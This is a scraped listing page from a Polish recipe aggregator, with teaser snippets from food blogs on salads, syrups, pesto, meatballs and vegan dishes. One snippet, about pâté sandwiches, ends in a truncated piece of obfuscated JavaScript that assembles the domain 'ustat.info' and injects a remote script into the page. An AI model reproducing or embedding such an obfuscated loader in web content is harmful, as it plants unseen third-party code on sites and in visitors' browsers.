smaczna sałatka - 13556 przepisów (strona:729/904)

„Witaminka” , pyszna , surówka z czerwonej kapusty 158

„Witaminka ” , pyszna ,surówka z czerwonej kapusty Witaminka , to świeża surówka , a takie są teraz najcenniejsze – nie przetworzone , znaczy zdrowsze Zima , to trudny czas

Ogrodnik w podróży
Carpaccio z buraków 190

Madzia zrobiła mi niespodziankę :) Na mój powrót z pracy zrobiła taki mega wypasiony obiad. To znaczy, żeby nie było, często robi obiady. Ale ten był naprawdę

Marder&Marder Manufacture
Syrop z mniszka lekarskiego. 152

Mniszek lekarski zwany popularnie mleczem albo dmuchawcem jest cenionym ziołem leczniczym. W lecznictwie stosowane są zarówno liście, kwiaty, jak i korzeń mniszka. Młode liście stanowią również dodatek do sałatek. Jest skarbnicą cennych substancji do których zaliczamy: witaminy A, C, D, a także witaminy z grupy B, minerały: żelazo, potas, krzem, magnez, garbniki, flawonoidy, triperpeny, inulinę, kwasy polifenelowe, asparginę oraz kwas(...)góry dnem i przykryć szmatką. Przechowywać w chłodnym i ciemnym miejscu. Termin ważności mija po kilku miesiącach od daty przygotowania syropu. Dawkowanie: 2-3 łyżeczki miodu z mniszka dziennie. Smacznego i na zdrowie

Zakątek rozkoszy kulinarnych
Makaron z brokułami 159

Makaron jest jednym z najsłynniejszych dodatków do dań, sałatek i przystawek. Jest często stosowany zarówno w kuchni studenckiej, ze względu na szybkość przygotowania i stosunkowo nie dużą cenę, jak i w wykwintnych restauracjach, ponieważ łatwo jest dodać go do różnego rodzaju wymagających potraw. Makaron może być niewiarygodnie tanim składnikiem dania, jak i drogim elementem wyższych półek sklepów z włoską żywnością(...)Nałóż na talerze, posyp tartym parmezanem i bazylią (nie koniecznie). ·         To jest pyszne! Zwłaszcza z lampką czerwonego wina. I jakie proste. Smacznego!   Autor: Córka

Moja Mama Gotuje
Udka z kurczaka po chińsku z surówką coleslaw 348

Z dzisiejszego obiadu najbardziej zadowolony jest mój P., bo nie dość, że jest mięso, to na dodatek w Jego ulubionej wersji- po chińsku :)  Udka są

Kraina Miodem Płynąca
Pesto z oliwek i suszonych pomidorów 202

tylko sos do makaronu , jeśli lubisz ten smak, to znakomicie doprawi ono chleb paleo (np. niskowęglowodanowy ), jajka na twardo, omlety, naleśniki paleo, majonez paleo, warzywa, sosy do sałatek albo mięsa, a nawet makaron z warzyw. Pesto możesz używać jako sos do warzyw na zimno pokrojonych w słupki (dobre na imprezy), ale dobrze też doprawia warzywa na ciepło, np. gotowane(...)mieści się w protokole autoimmunologicznym ze względu na pomidory i orzechy, a i same oliwki, nawet jak nie są nadziewane papryką, to często maja jakieś niedozwolone przyprawy (np. chili). Smacznego! Pesto z oliwek i suszonych pomidorów (bez sera) Wartość energetyczna Węglowodany (w tym błonnik) Tłuszcz Białko 100 g 620 kcal 15 g (6 g) 65 g 10 g Łyżka

PaleoSMAK
Sałatka Capri i w restauracji Sphinx 191

Normal 0 21 false false false PL X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:Standardowy; mso-tstyle-rowband-size:0; mso-tstyle-colband

Qlinarnie i Qlinarnie
Szybkie kanapki z pasztetem 129

dopadają nas one także w kuchni, a spokojnie zjedzony posiłek to podstawa dbania o swój przewód pokarmowy. Jeśli nie mamy czasu zadbajmy o to, aby przyrządzić coś szybko, ale smacznie i zdrowo. Śniadanie w domu lub w pracy, niespodziewani goście czy wyprawka dla dziecka do szkoły? Postawmy na nieskomplikowane, ale pożywne kanapki z pasztetem. Wbrew pozorom wcale nie muszą być(...)pasztetu powoli, np. przygotować z nich koreczki. Możemy ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru

Moja smaczna kuchnia
Król BROKUŁ z WEGAŃSKIM DIPEM CZOSNKOWYM 196

obok (razowy), mieszam z oliwą z oliwek i wykładam na talerze, odcedzam brokuła i wykładam na makaron, całość polewam elegancko dipem czosnkowym, do ozdoby trochę uprażonych nasion słonecznika i ... smacznego! Taki brokuł jest pięknie zielony, gorący i nie surowy :)  Ale właśnie, dip. Skąd go wziąć? Ano - zrobić... ze słonecznika :) O wegańskiej śmietanie słonecznikowej Matki Weganki wspomniałam już(...)żelaza, wapnia i tłuszczu = kwasów tłuszczowych.  Najwięcej wszystkiego oczywiście znowu w kiełkach ale osobiście pokochałam słonecznik w postaci właśnie śmietan-dipów-sosów albo uprażonych nasion, którymi można posypać sałatki, makarony lub... jeść łyżeczką zamiast chipsów :)  Ok, to tyle dziś. Wypróbujcie czosnkowy dip ze słonecznika a potem poczęstujcie nim swoich gości. Nikt, po prostu nikt nie zgaduje, z czego

Wegański blog WSZYSTKO JEST W GŁOWIE
Wielkanocna wegańska causa z majonezem bez jajek na oleju rzepakowym 206

chętnie przygotowuję to danie na Wielkanoc, pomyślałam, że dla wegan, którzy nie mają raczej zbyt dużego wyboru wielkanocnych potraw, będzie to świetna propozycja. Może z powodzeniem zastąpić np. tradycyjną sałatkę jarzynową, do której jest trochę podobna w smaku.  Wersja bez produktów pochodzenia zwierzęcego to nic trudnego, wystarczy zamienić kilka składników na ich wegańskie odpowiedniki i po kłopocie. Białko występujące(...)majonezie, warstwa puree z groszku i smaczliwki, warstwa czerwonej quinoy z majonezem i na koniec znów warstwa ziemniaków.  Wierzch przystrajamy mini marchewkami, szczypiorkiem, oliwkami i zielonym groszkiem. Smacznego

Quinoa Raz!
Kotlety mielone – najlepsze, najprostsze 240

opakowań ma przeźroczyste okienka, przez które na jeden rzut oka jesteście w stanie ocenić, jak grubo zmielone jest mięso — bierzcie to zmielone grubiej. Bardzo drobno zmielone mięso nie jest smaczne, włókna mięśniowe są w nim mocno zmiażdżone, nie pocięte. Zawsze możecie też, jeśli macie maszynkę, kupić wybrane kawałki wołowiny (pręga, łata, antrykot) i wieprzowiny (szynka, łopatka) i zmielić je sami(...)środku, usmażone kotlety wkładamy do naczynia żaroodpornego i na środkową półkę do piekarnika, na 10 minut. Podajemy z tym, z czym lubimy – ziemniaczanym purée, zasmażanymi buraczkami, ogórkiem kiszonym, ulubioną sałatką. Na drugi dzień można odsmażyć je, kładąc na patelnię z mieszanką wody i oleju – zostaną soczyste, a po odparowaniu wody odsmażą się na chrupiąco. Albo przeciąć w poprzek na pół

Karo in the Kitchen
Twarożek z cebulką i szczypiorkiem 273

Twarożek z cebulką i szczypiorkiem to świetna propozycja na śniadanie. Taki twarożek znany jest praktycznie w każdym polskim domu. Jego przygotowanie zajmuje dosłownie chwilę, a smak

Kulinarnyblog.pl - wiesz jak gotować!
Kurczak Buffalo + surówka z buraczków na zimno 188

Są takie dni, kiedy mało co mi pasuje. Za bardzo nie chce mi się gotować i kombinować lub zwyczajnie nie mam na to czasu, a nawet

Fabryka pomysłów
Jak smakuje późna wiosna w Polsce? 238

Jak zapamiętałam z Polski smak późnej wiosny ? Pamiętam, że s makowała jak świeży, młody ogród warzywny . Smakowała jak małe , młode ziemniaki gotowane ze skórką , okraszone świeżym

Jem więc Jestem
Boskie frytki i żeberka, smakowite poutine i burgery - Pittu Pittu 116

Dominik to chyba największy burgeroholik jakiego znam, dlatego często odwiedzamy miejsca, w których można zjeść te nafaszerowane dobrociami buły. Ja też bardzo je lubię, jednak czasami

Cooking Monster